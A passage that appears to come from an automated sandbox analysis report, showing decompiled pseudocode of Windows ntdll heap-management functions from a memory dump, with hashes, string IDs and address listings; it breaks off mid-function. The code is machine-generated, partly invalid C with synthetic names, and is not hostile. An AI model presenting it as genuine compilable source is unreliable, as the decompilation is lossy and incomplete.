                                                        • String ID: !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT)$@$Internal error check failed$Status != STATUS_NOT_FOUND$[%x.%x] SXS: %s - Relative redirection plus env var expansion.$d:\w7rtm\minkernel\ntdll\sxsisol.cpp$sxsisol_SearchActCtxForDllName
                                                        • API String ID: 0-4103935307
                                                        • Opcode ID: ef183b6e39f45deb2ddb7370939b47d4dfa7a71dbe1d9e4802b4186a7693f990
                                                        • Instruction ID: f5e465b39f28cd9edc2074863cb009045ccb8d7d2dc6968fcb3fb4183e9aa5b8
                                                        • Opcode Fuzzy Hash: ef183b6e39f45deb2ddb7370939b47d4dfa7a71dbe1d9e4802b4186a7693f990
                                                        • Instruction Fuzzy Hash: 32029270A0431ADBDB24CFA8C891ABEB7F1FF09704F2084ADE495E7251EB749945DB10
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 61%
                                                        			E00B6EE4C(void* __ebx, void* __edi, signed int _a4, unsigned int _a8, signed int _a12, signed int _a16) {
                                                        				signed int _v8;
                                                        				char _v12;
                                                        				signed int _v16;
                                                        				signed int _v20;
                                                        				signed int _v24;
                                                        				intOrPtr _v28;
                                                        				char _v32;
                                                        				char _v36;
                                                        				void* __esi;
                                                        				void* __ebp;
                                                        				signed int _t258;
                                                        				signed char _t259;
                                                        				signed int _t261;
                                                        				signed int _t271;
                                                        				signed int _t274;
                                                        				signed int _t275;
                                                        				signed int _t276;
                                                        				signed int _t278;
                                                        				signed char _t279;
                                                        				intOrPtr _t281;
                                                        				signed int _t293;
                                                        				intOrPtr _t300;
                                                        				intOrPtr _t301;
                                                        				unsigned int _t307;
                                                        				signed char _t308;
                                                        				signed int _t317;
                                                        				unsigned int _t326;
                                                        				signed int _t327;
                                                        				intOrPtr _t335;
                                                        				intOrPtr _t347;
                                                        				signed int _t357;
                                                        				signed int _t358;
                                                        				signed int _t359;
                                                        				signed int _t360;
                                                        				signed char _t363;
                                                        				signed int _t370;
                                                        				unsigned int _t380;
                                                        				signed int _t381;
                                                        				intOrPtr _t389;
                                                        				signed int _t401;
                                                        				intOrPtr _t403;
                                                        				void* _t410;
                                                        				signed int _t420;
                                                        				signed int _t421;
                                                        				unsigned int* _t426;
                                                        				signed int _t432;
                                                        				signed int _t442;
                                                        				intOrPtr _t444;
                                                        				signed int _t452;
                                                        				signed int _t456;
                                                        				intOrPtr _t457;
                                                        				void* _t472;
                                                        				signed int _t480;
                                                        				void* _t483;
                                                        				signed int _t484;
                                                        				intOrPtr _t486;
                                                        				signed short* _t487;
                                                        				signed short* _t488;
                                                        				unsigned int _t492;
                                                        				signed int _t493;
                                                        
                                                        				_t493 = _a4;
                                                        				_v12 = 0;
                                                        				if(( *(_t493 + 0xd0) ^  *(_t493 + 0x58)) != 0) {
                                                        					return E00B57353(_t493, _a8, _a12);
                                                        				}
                                                        				if(_a16 != 0) {
                                                        					_t420 = _a8;
                                                        					__eflags =  *(_t420 + 2) & 0x00000008;
                                                        					if(( *(_t420 + 2) & 0x00000008) != 0) {
                                                        						 *((intOrPtr*)(_t493 + 0x120)) =  *((intOrPtr*)(_t493 + 0x120)) - 1;
                                                        						_t258 = E00B761B3(_t420,  &_v36,  &_v24);
                                                        						__eflags = _t258;
                                                        						if(_t258 != 0) {
                                                        							 *((intOrPtr*)(_t493 + 0x124)) =  *((intOrPtr*)(_t493 + 0x124)) - _v24;
                                                        						}
                                                        					}
                                                        					_a4 = _t420;
                                                        					L13:
                                                        					_t259 =  *((intOrPtr*)(_t420 + 6));
                                                        					__eflags = _t259;
                                                        					if(_t259 == 0) {
                                                        						_t421 = _t493;
                                                        						_v20 = _t493;
                                                        					} else {
                                                        						_t421 = (_t420 & 0xffff0000) - ((_t259 & 0x000000ff) << 0x10) + 0x10000;
                                                        						__eflags = _t421;
                                                        						_v20 = _t421;
                                                        					}
                                                        					_t261 = _a4 + _a12 * 8;
                                                        					__eflags =  *((char*)(_t261 + 7)) - 3;
                                                        					_v24 = _t261;
                                                        					if( *((char*)(_t261 + 7)) == 3) {
                                                        						_t483 = _t261 + 8;
                                                        						E00B5AB77(_t493, _t483);
                                                        						_v28 =  *((intOrPtr*)(_t483 + 0x10));
                                                        						 *((intOrPtr*)(_t421 + 0x30)) =  *((intOrPtr*)(_t421 + 0x30)) - 1;
                                                        						_v16 =  *(_t483 + 0x14);
                                                        						 *((intOrPtr*)(_t421 + 0x2c)) =  *((intOrPtr*)(_t421 + 0x2c)) - ( *(_t483 + 0x14) >> 0xc);
                                                        						 *(_t493 + 0xe0) =  *(_t493 + 0xe0) +  *(_t483 + 0x14);
                                                        						 *((intOrPtr*)(_t493 + 0xf0)) =  *((intOrPtr*)(_t493 + 0xf0)) - 1;
                                                        						__eflags =  *(_t483 + 0x14) - 0x7f000;
                                                        						if( *(_t483 + 0x14) >= 0x7f000) {
                                                        							_t102 = _t493 + 0xe4;
                                                        							 *_t102 =  *(_t493 + 0xe4) -  *(_t483 + 0x14);
                                                        							__eflags =  *_t102;
                                                        						}
                                                        						_a12 = _a12 + ( *(_t483 + 0x14) >> 3) + 0x20;
                                                        						_v12 = 1;
                                                        					} else {
                                                        						_t32 =  &_v16;
                                                        						 *_t32 = _v16 & 0x00000000;
                                                        						__eflags =  *_t32;
                                                        					}
                                                        					_t271 = _a4;
                                                        					__eflags =  *(_t271 + 4) ^  *(_t493 + 0x54);
                                                        					if(( *(_t271 + 4) ^  *(_t493 + 0x54)) == 0) {
                                                        						_t471 = _a4;
                                                        						_v8 = _a4;
                                                        						_t274 = E00B98C11(_t421, _a4);
                                                        						__eflags = _a16;
                                                        						_t484 = _t274;
                                                        						if(_a16 != 0) {
                                                        							__eflags = _t484;
                                                        							if(_t484 != 0) {
                                                        								goto L56;
                                                        							}
                                                        							goto L18;
                                                        						}
                                                        						L56:
                                                        						__eflags =  *0xc277b0 - 1;
                                                        						if( *0xc277b0 >= 1) {
                                                        							__eflags = _t484;
                                                        							if(_t484 == 0) {
                                                        								_t347 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                        								__eflags =  *((intOrPtr*)(_t347 + 0xc)) - _t484;
                                                        								if( *((intOrPtr*)(_t347 + 0xc)) == _t484) {
                                                        									_push("HEAP: ");
                                                        									E00B9373B();
                                                        								} else {
                                                        									E00B9373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
                                                        								}
                                                        								_push("(UCRBlock != NULL)");
                                                        								E00B9373B();
                                                        								E00BEF826(_t421, _t471, _t484, _t493, 1);
                                                        							}
                                                        						}
                                                        						__eflags = _v12;
                                                        						_t275 = _a12;
                                                        						_t432 = _a4;
                                                        						if(_v12 != 0) {
                                                        							_t276 = _t432 + _t275 * 8;
                                                        						} else {
                                                        							_t130 = _t275 * 8; // -16
                                                        							_t276 = _t432 + _t130 - 0x10;
                                                        						}
                                                        						_t278 = (_t276 & 0xfffff000) - _v8;
                                                        						__eflags = _t278;
                                                        						_a8 = _t278;
                                                        						if(__eflags == 0) {
                                                        							L85:
                                                        							__eflags =  *0xc277b0 - 1;
                                                        							if( *0xc277b0 >= 1) {
                                                        								__eflags = _v12;
                                                        								if(_v12 != 0) {
                                                        									_t281 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                        									__eflags =  *(_t281 + 0xc);
                                                        									if( *(_t281 + 0xc) == 0) {
                                                        										_push("HEAP: ");
                                                        										E00B9373B();
                                                        									} else {
                                                        										E00B9373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
                                                        									}
                                                        									_push("(!TrailingUCR)");
                                                        									E00B9373B();
                                                        									E00BEF826(_t421, _t471, _t484, _t493, 1);
                                                        								}
                                                        							}
                                                        							goto L54;
                                                        						} else {
                                                        							_t293 = E00B54167(_t471, __eflags, 0xffffffff,  &_v8,  &_a8, 0x4000);
                                                        							__eflags = _t293;
                                                        							if(_t293 < 0) {
                                                        								L89:
                                                        								_t472 = 3;
                                                        								E00B5444F(_t493, _t472);
                                                        								__eflags = _v12;
                                                        								if(_v12 != 0) {
                                                        									E00B5A96B(_t493, _t421, _v28 + 0xffffffe8, _v16, _a4,  &_a12);
                                                        								}
                                                        								L54:
                                                        								_push(_a12);
                                                        								_push(_a4);
                                                        								L12:
                                                        								_push(_t493);
                                                        								_t279 = E00B57353();
                                                        								L7:
                                                        								return _t279;
                                                        							}
                                                        							__eflags =  *0x7ffe0380;
                                                        							if( *0x7ffe0380 != 0) {
                                                        								_t300 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                        								__eflags =  *(_t300 + 0x240) & 0x00000001;
                                                        								if(( *(_t300 + 0x240) & 0x00000001) != 0) {
                                                        									E00BEEFE0(_t493, _v8, _a8, 5);
                                                        								}
                                                        							}
                                                        							 *((intOrPtr*)(_t493 + 0xf8)) =  *((intOrPtr*)(_t493 + 0xf8)) + 1;
                                                        							_t301 =  *((intOrPtr*)(_t484 + 0x14));
                                                        							__eflags = _t301 - 0x7f000;
                                                        							if(_t301 >= 0x7f000) {
                                                        								_t139 = _t493 + 0xe4;
                                                        								 *_t139 =  *(_t493 + 0xe4) - _t301;
                                                        								__eflags =  *_t139;
                                                        							}
                                                        							E00B5AB77(_t493, _t484);
                                                        							 *((intOrPtr*)(_t484 + 0x14)) =  *((intOrPtr*)(_t484 + 0x14)) + _a8;
                                                        							E00B5AA2C(_t493, _t484);
                                                        							 *((intOrPtr*)(_t421 + 0x2c)) =  *((intOrPtr*)(_t421 + 0x2c)) + (_a8 >> 0xc);
                                                        							_t307 = _a8;
                                                        							 *(_t493 + 0xe0) =  *(_t493 + 0xe0) - _t307;
                                                        							_t486 =  *((intOrPtr*)(_t484 + 0x14));
                                                        							__eflags = _t486 - 0x7f000;
                                                        							if(_t486 >= 0x7f000) {
                                                        								_t151 = _t493 + 0xe4;
                                                        								 *_t151 =  *(_t493 + 0xe4) + _t486;
                                                        								__eflags =  *_t151;
                                                        							}
                                                        							__eflags = _v12;
                                                        							if(_v12 != 0) {
                                                        								L73:
                                                        								_t308 =  *0x7ffe0380;
                                                        								__eflags = _t308;
                                                        								if(_t308 != 0) {
                                                        									__eflags =  *( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x240) & 0x00000001;
                                                        									if(__eflags != 0) {
                                                        										E00BEF48C(__eflags, _t493, _v8, _a8,  *(_t493 + 0x78) << 3, _v12, _v16, _t308 & 0x000000ff);
                                                        									}
                                                        								}
                                                        								_t279 =  *0x7ffe038a;
                                                        								__eflags = _t279;
                                                        								if(__eflags != 0) {
                                                        									_push(_t279 & 0x000000ff);
                                                        									_push(_v16);
                                                        									_push(_v12);
                                                        									L118:
                                                        									_push( *(_t493 + 0x78) << 3);
                                                        									_push(_a8);
                                                        									_push(_v8);
                                                        									_push(_t493);
                                                        									_t279 = E00BEF48C(__eflags);
                                                        								}
                                                        								goto L7;
                                                        							} else {
                                                        								_t487 = _t307 + _v8;
                                                        								_t442 = _a4;
                                                        								_t487[2] =  *(_t493 + 0x54);
                                                        								_t317 = _a12;
                                                        								_t476 = _a8 + _v8;
                                                        								__eflags = _t442 + _t317 * 8 - _a8 + _v8;
                                                        								if(_t442 + _t317 * 8 == _a8 + _v8) {
                                                        									__eflags =  *(_t493 + 0x4c);
                                                        									if( *(_t493 + 0x4c) != 0) {
                                                        										_t487[1] = _t487[1] ^ _t487[0] ^  *_t487;
                                                        										 *_t487 =  *_t487 ^  *(_t493 + 0x50);
                                                        									}
                                                        									goto L73;
                                                        								}
                                                        								_t487[3] = 0;
                                                        								_t487[1] = 0;
                                                        								_t326 = (_a12 << 3) - _a8 >> 3;
                                                        								 *_t487 = _t326;
                                                        								__eflags =  *0xc277b0 - 1;
                                                        								if( *0xc277b0 >= 1) {
                                                        									__eflags = _t326 - 1;
                                                        									if(_t326 <= 1) {
                                                        										_t335 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                        										__eflags =  *(_t335 + 0xc);
                                                        										if( *(_t335 + 0xc) == 0) {
                                                        											_push("HEAP: ");
                                                        											E00B9373B();
                                                        										} else {
                                                        											E00B9373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
                                                        										}
                                                        										_push("((LONG)FreeEntry->Size > 1)");
                                                        										E00B9373B();
                                                        										E00BEF826(_t421, _t476, _t487, _t493, 1);
                                                        									}
                                                        								}
                                                        								_t487[1] = 0;
                                                        								_t444 =  *((intOrPtr*)(_t421 + 0x18));
                                                        								__eflags = _t444 - _t421;
                                                        								if(_t444 == _t421) {
                                                        									_t327 = 0;
                                                        								} else {
                                                        									_t327 = (_t487 - _t421 >> 0x10) + 1;
                                                        									_a16 = _t327;
                                                        									__eflags = _t327;
                                                        									if(__eflags <= 0) {
                                                        										L99:
                                                        										_push(0);
                                                        										_push(0);
                                                        										_push(_t421);
                                                        										_push(_t487);
                                                        										_push(_t444);
                                                        										_push(3);
                                                        										E00BEF840(_t421, _t444, _t476, _t487, _t493, __eflags);
                                                        										_t327 = _a16;
                                                        										L72:
                                                        										_t487[3] = _t327;
                                                        										E00B57353(_t493, _t487,  *_t487 & 0x0000ffff);
                                                        										goto L73;
                                                        									}
                                                        									__eflags = _t327 - 0xfe;
                                                        									if(__eflags >= 0) {
                                                        										goto L99;
                                                        									}
                                                        								}
                                                        								goto L72;
                                                        							}
                                                        						}
                                                        					}
                                                        					L18:
                                                        					_t357 = _a4;
                                                        					_t38 = _t357 + 0x101f; // 0x101f
                                                        					_t484 = 0xfffff000;
                                                        					_t452 = _t38 & 0xfffff000;
                                                        					_t39 = _t357 + 0x28; // 0x28
                                                        					_v8 = _t452;
                                                        					__eflags = _t452 - _t39;
                                                        					if(_t452 == _t39) {
                                                        						_t452 = _t452 + 0x1000;
                                                        						_v8 = _t452;
                                                        					}
                                                        					__eflags = _v12;
                                                        					_t471 = _a12;
                                                        					if(_v12 != 0) {
                                                        						_t358 = _t357 + _t471 * 8;
                                                        					} else {
                                                        						_t358 = _t357 + _t471 * 8 - 0x10;
                                                        					}
                                                        					_t359 = _t358 & _t484;
                                                        					_a8 = _t359;
                                                        					__eflags = _t359 - _t452;
                                                        					if(_t359 < _t452) {
                                                        						goto L85;
                                                        					} else {
                                                        						_t360 = _t359 - _t452;
                                                        						__eflags = _a16;
                                                        						_a8 = _t360;
                                                        						if(_a16 != 0) {
                                                        							L26:
                                                        							__eflags = _t360;
                                                        							if(__eflags == 0) {
                                                        								L30:
                                                        								__eflags = _v12;
                                                        								if(_v12 != 0) {
                                                        									L38:
                                                        									E00B5A96B(_t493, _t421, _t452 + 0xffffffe8, _t360, _a4,  &_v32);
                                                        									E00B57353(_t493, _a4, _v32);
                                                        									_t363 =  *0x7ffe0380;
                                                        									__eflags = _t363;
                                                        									if(_t363 != 0) {
                                                        										__eflags =  *( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x240) & 0x00000001;
                                                        										if(__eflags != 0) {
                                                        											E00BEF48C(__eflags, _t493, _v8, _a8,  *(_t493 + 0x78) << 3, 0, 0, _t363 & 0x000000ff);
                                                        										}
                                                        									}
                                                        									_t279 =  *0x7ffe038a;
                                                        									__eflags = _t279;
                                                        									if(__eflags == 0) {
                                                        										goto L7;
                                                        									} else {
                                                        										_push(_t279 & 0x000000ff);
                                                        										_push(0);
                                                        										_push(0);
                                                        										goto L118;
                                                        									}
                                                        								}
                                                        								_t488 = _t360 + _t452;
                                                        								_t456 = _a4;
                                                        								_t488[2] =  *(_t493 + 0x54);
                                                        								_t370 = _a12;
                                                        								_t479 = _t456 + _t370 * 8;
                                                        								_t360 = _a8;
                                                        								_t452 = _v8;
                                                        								_t423 = _t360 + _t452;
                                                        								__eflags = _t456 + _t370 * 8 - _t360 + _t452;
                                                        								if(_t456 + _t370 * 8 == _t360 + _t452) {
                                                        									__eflags =  *(_t493 + 0x4c);
                                                        									_t421 = _v20;
                                                        									if( *(_t493 + 0x4c) != 0) {
                                                        										_t488[1] = _t488[1] ^ _t488[0] ^  *_t488;
                                                        										 *_t488 =  *_t488 ^  *(_t493 + 0x50);
                                                        										L37:
                                                        										_t360 = _a8;
                                                        										_t452 = _v8;
                                                        										goto L38;
                                                        									}
                                                        									goto L38;
                                                        								}
                                                        								_t488[3] = 0;
                                                        								_t488[1] = 0;
                                                        								_t380 = (_a12 << 3) - _a8 - _v8 + _a4 >> 3;
                                                        								 *_t488 = _t380;
                                                        								__eflags =  *0xc277b0 - 1;
                                                        								if( *0xc277b0 >= 1) {
                                                        									__eflags = _t380 - 1;
                                                        									if(_t380 <= 1) {
                                                        										_t389 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                        										__eflags =  *(_t389 + 0xc);
                                                        										if( *(_t389 + 0xc) == 0) {
                                                        											_push("HEAP: ");
                                                        											E00B9373B();
                                                        										} else {
                                                        											E00B9373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
                                                        										}
                                                        										_push("(LONG)FreeEntry->Size > 1");
                                                        										E00B9373B();
                                                        										E00BEF826(_t423, _t479, _t488, _t493, 1);
                                                        									}
                                                        								}
                                                        								_t421 = _v20;
                                                        								_t488[1] = 0;
                                                        								_t457 =  *((intOrPtr*)(_t421 + 0x18));
                                                        								__eflags = _t457 - _t421;
                                                        								if(_t457 == _t421) {
                                                        									_t381 = 0;
                                                        								} else {
                                                        									_t381 = (_t488 - _t421 >> 0x10) + 1;
                                                        									_a16 = _t381;
                                                        									__eflags = _t381;
                                                        									if(__eflags <= 0) {
                                                        										L113:
                                                        										_push(0);
                                                        										_push(0);
                                                        										_push(_t421);
                                                        										_push(_t488);
                                                        										_push(_t457);
                                                        										_push(3);
                                                        										E00BEF840(_t421, _t457, _t479, _t488, _t493, __eflags);
                                                        										_t381 = _a16;
                                                        										L36:
                                                        										_t488[3] = _t381;
                                                        										E00B57353(_t493, _t488,  *_t488 & 0x0000ffff);
                                                        										goto L37;
                                                        									}
                                                        									__eflags = _t381 - 0xfe;
                                                        									if(__eflags >= 0) {
                                                        										goto L113;
                                                        									}
                                                        								}
                                                        								goto L36;
                                                        							}
                                                        							 *((intOrPtr*)(_t493 + 0xf8)) =  *((intOrPtr*)(_t493 + 0xf8)) + 1;
                                                        							_t401 = E00B54167(_t471, __eflags, 0xffffffff,  &_v8,  &_a8, 0x4000);
                                                        							__eflags = _t401;
                                                        							if(_t401 < 0) {
                                                        								goto L89;
                                                        							}
                                                        							__eflags =  *0x7ffe0380;
                                                        							if( *0x7ffe0380 != 0) {
                                                        								_t403 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                        								__eflags =  *(_t403 + 0x240) & 0x00000001;
                                                        								if(( *(_t403 + 0x240) & 0x00000001) != 0) {
                                                        									E00BEEFE0(_t493, _v8, _a8, 6);
                                                        								}
                                                        							}
                                                        							_t360 = _a8;
                                                        							_t452 = _v8;
                                                        							goto L30;
                                                        						}
                                                        						_t471 = _v24;
                                                        						__eflags =  *((char*)(_t471 + 7)) - 3;
                                                        						if( *((char*)(_t471 + 7)) == 3) {
                                                        							goto L26;
                                                        						}
                                                        						__eflags = _t360;
                                                        						if(_t360 == 0) {
                                                        							goto L54;
                                                        						}
                                                        						__eflags = _t360 -  *((intOrPtr*)(_t493 + 0x70));
                                                        						if(_t360 <  *((intOrPtr*)(_t493 + 0x70))) {
                                                        							goto L54;
                                                        						}
                                                        						goto L26;
                                                        					}
                                                        				}
                                                        				_t480 = _a12;
                                                        				if(_t480 <  *((intOrPtr*)(_t493 + 0x70))) {
                                                        					L11:
                                                        					_push(_t480);
                                                        					_push(_a8);
                                                        					goto L12;
                                                        				}
                                                        				_t410 =  *(_t493 + 0x78) + _t480;
                                                        				if(_t410 <  *((intOrPtr*)(_t493 + 0x74)) || _t410 <  *(_t493 + 0xe0) >>  *((intOrPtr*)(_t493 + 0x130)) + 3) {
                                                        					goto L11;
                                                        				} else {
                                                        					_t420 = _a8;
                                                        					_a4 = E00B529B2(_t493, _t420,  &_a12, 0);
                                                        					_t413 = _a12;
                                                        					if(_a12 - 0x201 > 0xfbff) {
                                                        						goto L13;
                                                        					} else {
                                                        						E00B57353(_t493, _a4, _t413);
                                                        						_t492 =  *(_t493 + 0xe0) - ( *(_t493 + 0x78) << 3);
                                                        						_t279 =  *(_t493 + 0x128) - ( *(_t493 + 0x128) >> 3);
                                                        						if(_t492 < _t279) {
                                                        							_t426 = _t493 + 0x12c;
                                                        							_t279 =  *_t426 - ( *_t426 >> 3);
                                                        							__eflags = _t492 - _t279;
                                                        							if(_t492 > _t279) {
                                                        								_t279 = E00B76372(_t493);
                                                        								 *_t426 = _t492;
                                                        								 *(_t493 + 0x128) = _t492;
                                                        							}
                                                        						}
                                                        						goto L7;
                                                        					}
                                                        				}
                                                        			}































































                                                        0x00000000
                                                        0x00000000
                                                        0x00b89c3f
                                                        0x00b89c1a
                                                        0x00b6ee77
                                                        0x00b6ee7d
                                                        0x00b842d6
                                                        0x00b842d6
                                                        0x00b842d7
                                                        0x00000000
                                                        0x00b842d7
                                                        0x00b6ee86
                                                        0x00b6ee8b
                                                        0x00000000
                                                        0x00b6eeaa
                                                        0x00b6eeaa
                                                        0x00b6eeba
                                                        0x00b6eebd
                                                        0x00b6eecc
                                                        0x00000000
                                                        0x00b6eed2
                                                        0x00b6eed7
                                                        0x00b6eee8
                                                        0x00b6eef5
                                                        0x00b6eef9
                                                        0x00b6ef02
                                                        0x00b6ef0f
                                                        0x00b6ef11
                                                        0x00b6ef13
                                                        0x00b6ef17
                                                        0x00b6ef1c
                                                        0x00b6ef1e
                                                        0x00b6ef1e
                                                        0x00b6ef13
                                                        0x00000000
                                                        0x00b6eef9
                                                        0x00b6eecc

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                        • API String ID: 0-523794902
                                                        • Opcode ID: 93cab4f53681a143c19e6d5e01fd118cdf8e35cf787bb5b8b10b4ccf762966c5
                                                        • Instruction ID: 8a37e41296aeb28885c8e453abc0029e0cac8898635f1df82a7778b798780e6c
                                                        • Opcode Fuzzy Hash: 93cab4f53681a143c19e6d5e01fd118cdf8e35cf787bb5b8b10b4ccf762966c5
                                                        • Instruction Fuzzy Hash: 5C32DC71604689AFDF11DF68C880FAAB7E5FF05310F1480E9F8558B292DB34EA85DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 62%
                                                        			E00B57353(signed int _a4, signed int _a8, void* _a11, signed int _a12) {
                                                        				signed int _v8;
                                                        				signed short _v12;
                                                        				signed short _v16;
                                                        				signed int _v20;
                                                        				signed short _v24;
                                                        				signed int _v28;
                                                        				signed int _v32;
                                                        				signed int _v36;
                                                        				signed int __ebx;
                                                        				signed int __edi;
                                                        				signed int __esi;
                                                        				void* __ebp;
                                                        				signed short _t197;
                                                        				signed int _t200;
                                                        				signed int _t201;
                                                        				signed int _t205;
                                                        				signed short _t206;
                                                        				signed short _t210;
                                                        				signed short _t211;
                                                        				intOrPtr _t218;
                                                        				signed short _t220;
                                                        				signed int _t221;
                                                        				signed short _t223;
                                                        				signed short* _t225;
                                                        				signed short _t226;
                                                        				signed short* _t229;
                                                        				signed short _t230;
                                                        				signed short _t237;
                                                        				signed int _t239;
                                                        				signed short _t240;
                                                        				signed short _t248;
                                                        				signed short _t249;
                                                        				signed short _t257;
                                                        				signed int _t266;
                                                        				signed short _t268;
                                                        				signed int _t269;
                                                        				signed int _t270;
                                                        				signed short* _t276;
                                                        				signed short* _t277;
                                                        				signed int _t282;
                                                        				intOrPtr _t284;
                                                        				signed int* _t286;
                                                        				signed short _t291;
                                                        				signed short _t294;
                                                        				signed short _t297;
                                                        				signed short _t298;
                                                        				signed int _t299;
                                                        				signed short _t304;
                                                        				signed int _t305;
                                                        				signed short _t307;
                                                        				signed short _t310;
                                                        				signed short _t311;
                                                        				intOrPtr _t318;
                                                        				intOrPtr _t319;
                                                        				signed short _t320;
                                                        				signed short _t321;
                                                        				signed int _t323;
                                                        				void* _t327;
                                                        				signed short _t329;
                                                        				signed int _t330;
                                                        				intOrPtr _t333;
                                                        				signed int _t335;
                                                        				signed int _t336;
                                                        				signed short _t340;
                                                        				signed short _t341;
                                                        				signed short _t342;
                                                        				signed short _t343;
                                                        				signed int _t344;
                                                        				signed int _t348;
                                                        				signed int _t350;
                                                        				intOrPtr _t353;
                                                        				signed short* _t354;
                                                        
                                                        				if(_a12 == 0) {
                                                        					return _t197;
                                                        				} else {
                                                        					_push(__ebx);
                                                        					_push(__esi);
                                                        					__esi = _a8;
                                                        					_push(__edi);
                                                        					__edi = _a4;
                                                        					__ebx = ( *(__esi + 4) ^  *(__edi + 0x54)) & 0x0000ffff;
                                                        					__eflags = __bx;
                                                        					if(__bx == 0) {
                                                        						__eflags =  *0xc277b0 - 1;
                                                        						if( *0xc277b0 >= 1) {
                                                        							__eflags =  *(__esi + 2) & 0x00000008;
                                                        							if(( *(__esi + 2) & 0x00000008) == 0) {
                                                        								__esi + 0xfff = __esi + 0x00000fff & 0xfffff000;
                                                        								__eflags = (__esi + 0x00000fff & 0xfffff000) - __esi;
                                                        								if((__esi + 0x00000fff & 0xfffff000) != __esi) {
                                                        									__eax =  *[fs:0x18];
                                                        									__eax =  *( *[fs:0x18] + 0x30);
                                                        									__eflags =  *(__eax + 0xc);
                                                        									if( *(__eax + 0xc) == 0) {
                                                        										_push("HEAP: ");
                                                        										__eax = E00B9373B();
                                                        									} else {
                                                        										 *[fs:0x18] =  *( *[fs:0x18] + 0x30);
                                                        										 *((intOrPtr*)( *( *[fs:0x18] + 0x30) + 0xc)) =  *((intOrPtr*)( *((intOrPtr*)( *( *[fs:0x18] + 0x30) + 0xc)) + 0xc));
                                                        										 *((intOrPtr*)( *((intOrPtr*)( *( *[fs:0x18] + 0x30) + 0xc)) + 0xc)) + 0x2c = E00B9373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *( *[fs:0x18] + 0x30) + 0xc)) + 0xc)) + 0x2c);
                                                        										_pop(__ecx);
                                                        									}
                                                        									_pop(__ecx);
                                                        									_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
                                                        									__eax = E00B9373B();
                                                        									_pop(__ecx);
                                                        									__eax = E00BEF826(__ebx, __edx, __edi, __esi, 1);
                                                        								}
                                                        							}
                                                        						}
                                                        					}
                                                        					__al =  *((intOrPtr*)(__esi + 6));
                                                        					__eflags = __al;
                                                        					if(__al == 0) {
                                                        						_v28 = __edi;
                                                        					} else {
                                                        						__ecx = __al & 0x000000ff;
                                                        						__eax = __esi;
                                                        						__ecx = (__al & 0x000000ff) << 0x10;
                                                        						__esi & 0xffff0000 = (__esi & 0xffff0000) - __ecx;
                                                        						__eax = (__esi & 0xffff0000) - __ecx + 0x10000;
                                                        						__eflags = __eax;
                                                        						_v28 = __eax;
                                                        					}
                                                        					__al =  *(__esi + 2);
                                                        					_a11 =  *(__esi + 2);
                                                        					do {
                                                        						__eflags = _a12 - 0xfe00;
                                                        						if(_a12 > 0xfe00) {
                                                        							__eflags = _a12 - 0xfe01;
                                                        							_v8 = 0xfe00;
                                                        							if(_a12 == 0xfe01) {
                                                        								_v8 = 0xfdf0;
                                                        							}
                                                        							_t354[1] = 0;
                                                        						} else {
                                                        							_v8 = _a12 & 0x0000ffff;
                                                        							_t354[1] = _a11;
                                                        						}
                                                        						_t333 = _a4;
                                                        						_t354[2] =  *(_t333 + 0x54) ^ _t266;
                                                        						_t205 = _v28;
                                                        						_t284 =  *((intOrPtr*)(_t205 + 0x18));
                                                        						__eflags = _t284 - _t205;
                                                        						if(_t284 == _t205) {
                                                        							_t268 = 0;
                                                        						} else {
                                                        							_t268 = (_t354 - _t205 >> 0x10) + 1;
                                                        							__eflags = _t268;
                                                        							if(__eflags <= 0) {
                                                        								L113:
                                                        								_push(0);
                                                        								_push(0);
                                                        								_push(_t205);
                                                        								_push(_t354);
                                                        								_push(_t284);
                                                        								_push(3);
                                                        								E00BEF840(_t268, _t284, _t318, _t333, _t354, __eflags);
                                                        								L11:
                                                        								_t206 = _v8;
                                                        								_t354[1] = _t354[1] & 0x000000f0;
                                                        								_t354[3] = _t268;
                                                        								 *_t354 = _t206;
                                                        								_t354[1] = 0;
                                                        								_t354[3] = 0;
                                                        								__eflags =  *(_t333 + 0x40) & 0x00000040;
